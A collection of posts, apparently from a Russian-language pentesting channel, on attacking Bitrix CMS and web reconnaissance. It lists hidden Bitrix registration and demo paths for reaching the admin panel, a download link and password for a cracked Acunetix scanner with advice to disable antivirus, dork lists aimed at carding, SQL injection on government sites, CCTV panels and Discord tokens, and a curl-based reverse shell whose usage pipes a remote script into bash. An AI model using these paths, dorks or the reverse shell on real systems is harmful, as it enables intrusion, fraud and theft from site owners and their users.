#pentest #web

#bitrix

Карочи, в админку в битриксе иногда можно зайти просто зарегистрировавшись.
Но у многих кнопка регистрации вовсе отсутствует, но это не мешает вызвать стандартные формы:

/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes

Наличие форм, кстати, тоже не обязательно, достаточно разгадать капчу (если она вообще есть) и отправить POST-запрос на регу.

Помимо стандартных путей, существуют еще demo-проекты:

/bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/custom-registration/index.php
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/my-components/news_list.php?register=yes
/bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subscr_edit.php?register=yes

Или можно попробовать обратиться к подобным модулям:

/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/ru/personal/profile/index.php?register=yes
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/ru/board/my/index.php?register=yes

После регистрации (получив валидный сессионный идентификатор), можно побрутить директорию /bitrix/ следующими файликами.

#pentest #web

Дорогие друзья, почти эксклюзив! Презентация от многоуважаемого @i_bo0om с форума KazHackStan на тему атак на CMS Bitrix.
В дополнение к данной презентации скидываю некогда нашумевший мануал Attacking Bitrix от этого же Автора

Caster - MikroTik Nightmare (LIVE SET)

Genre: Offensive
Subgenre: Security Issues, Penetration Testing, Pivoting, Experimental, Post-Exploitation
Label: OFFZONE 2023
Release Date: 24 August 2023

https://www.youtube.com/watch?v=hkl1arlmedw

#pentest #web

У google dorks небольшое обновление - возможность искать .csv файлы. Звучит и выглядит обещающе!

Dork:
filetype:csv

#pentest #web

Acunetix v23.8.230905089 - 05 Sep 2023

Windows: https://ponies.cloud/scanner_web/acunetix/Acunetix-v23.8-Windows-Pwn3rzs-CyberArsenal.rar
Password: Pwn3rzs

Setup:
See README.txt

Enjoy!

NOTE:
The issue "job_not_found" seemed to be caused by Defender in place, since the binary is packed to avoid leechers / skids.
You should add it to exceptions (best solution) or disable AV (not really good)

Changelog:
Too long for post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v23-8-230905089-5-september-2023/

#pentest #web

Github dorks

https://github.com/techgaun/github-dorks
https://github.com/jcesarstef/ghhdb-Github-Hacking-Database
https://github.com/H4CK3RT3CH/github-dorks
https://github.com/Vaidik-pandya/Github_recon_dorks/blob/main/gitdork.txt (for finding files)


Shodan dorks

https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/1-part-100-article/google/Shodan%20Queries.txt
https://github.com/humblelad/Shodan-Dorks
https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks
https://github.com/lothos612/shodan
https://github.com/jakejarvis/awesome-shodan-queries
https://github.com/IFLinfosec/shodan-dorks
https://www.osintme.com/index.php/2021/01/16/ultimate-osint-with-shodan-100-great-shodan-queries/


Netlas dorks

https://github.com/netlas-io/netlas-dorks


Censys dorks

https://github.com/thehappydinoa/awesome-censys-queries

Virus Total dorks

https://github.com/Neo23x0/vti-dorks


Binary Edge + Shodan + Google

https://github.com/iGotRootSRC/Dorkers


Google, Bing, Ecosia, Yahoo or Yandex

https://github.com/Zarcolio/sitedorks


Google dorks

https://github.com/BullsEye0/google_dork_list
https://github.com/sushiwushi/bug-bounty-dorks
https://github.com/rootac355/SQL-injection-dorks-list
https://github.com/unexpectedBy/SQLi-Dork-Repository
https://github.com/thomasdesr/Google-dorks
https://github.com/arimogi/Google-Dorks
https://github.com/aleedhillon/7000-Google-Dork-List


Onion dorks

Dorks for searching .onion sites saved in oniline proxies services https://github.com/cipher387/Dorks-collections-list/blob/main/onion.txt

CCTV dorks

Dorks for search CCTV cams admin panels https://github.com/cipher387/Dorks-collections-list/blob/main/cctv.txt
Camera dorks from @tru_1veresk https://github.com/iveresk/camera_dorks/blob/main/dorks.json
Google Dorks of Live Webcams, CCTV etc. (from d4msec) https://d4msec.wordpress.com/2015/09/05/google-dorks-of-live-webcams-cctv-etc-google-unsecured-ip-cameras/

Backlink dorks

List https://github.com/alfazzafashion/Backlink-dorks
Explanation https://www.techywebtech.com/2021/08/backlink-dorks.html
1150 dorks for forum hunting https://www.blackhatworld.com/seo/get-backlinks-yourself-1150-dorks-for-forum-hunting.380843/

Token dorks

Discord Bots Tokens https://github.com/traumatism/get-discord-bots-tokens-with-google

Hidden files dorks

Universal for Google, Bing etc

https://github.com/0xAbbarhSF/Info-Sec-Dork-List/blob/main/hidden_files_dork.txt

Admin panel dorks


https://github.com/cyberm0n/admin-panel-dorks/blob/main/dorks.txt

SQL injection dorks

SQL injection dorks for goverment sites https://github.com/readloud/Google-Hacking-Database-GHDB/blob/main/sql_gov_dorks.txt
SQL injection dorks 2019 https://github.com/readloud/Google-Hacking-Database-GHDB/blob/main/sqli_dork_2019.txt

Linkedin dorks (Google X-Ray search for Linkedin)

Linkedin X-Ray search queries and tools https://github.com/krlabs/linkedin-dorks

Carding dorks

1170 carding dorks https://pastebin.com/GYXLqgU0
17K carding dorks 2019 https://pastebin.com/fgdZxy74

Gaming dorks

7K Gaming Dorks From My Shop https://pastebin.com/ajuixpY2
Minecraft https://pastebin.com/ssNgdTkC

Shopping dorks

10k Amazon dorks https://pastebin.com/1HrmzFre
820 shopping Dorks for SQLi https://pastebin.com/1kED1FDX

Cryptocurrency dorks
15K dorks to find vulnerable pages related to cryptocurrency exchanges, cryptocurrency payments, etc. https://www.scribd.com/document/384770530/15k-Btc-Dorks

18K Bitcoin and other cryptocurency related dorks https://pdfcoffee.com/18k-bitcoin-dorks-list--3-pdf-free.html


Bug Bounty Dorks

https://github.com/hackingbharat/bug-bounty-dorks-archive/blob/main/bbdorks
https://github.com/Vinod-1122/bug-bounty-dorks/blob/main/Dorks.txt

GIT files Dorks

https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt

Log files Dorks

https://github.com/Proviesec/google-dorks/blob/main/google-dorks-best-log.txt

CMS Dorks

Wordpress https://pastebin.com/A9dsmgHQ
Magento https://pastebin.com/k75Y2QhF
Joomla https://pastebin.com/vVQFTzVC

Cloud instance dorks

#pentest #web

АЛЯРМ АЛЯРМ

#pentest #web

В свете последних событий, вдруг кто-то собирается удивить нас новыми уязвимостями в Битриксе, держите исходники

https://gitlab.com/alexprowars/bitrix/-/tree/master

#pentest #web

curlshell
reverse shell using curl
*
usage:
*
Start your listener:
./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234

On the remote side:
curl https://curlshell:1234 | bash

download

#shell #curl

#pentest #web

puredns

puredns is a fast domain resolver and subdomain bruteforcing tool that can accurately filter out wildcard subdomains and DNS poisoned entries.

It uses massdns, a powerful stub DNS resolver, to perform bulk lookups. With the proper bandwidth and a good list of public resolvers, it can resolve millions of queries in just a few minutes. Unfortunately, the results from massdns are only as good as the answers provided by the public resolvers. The results are often polluted by wrong DNS answers and false positives from wildcard subdomains.

Examples of usage:
puredns resolve domains.txt
puredns bruteforce wordlist.txt domain.com --resolvers public.txt
cat domains.txt | puredns resolve

Github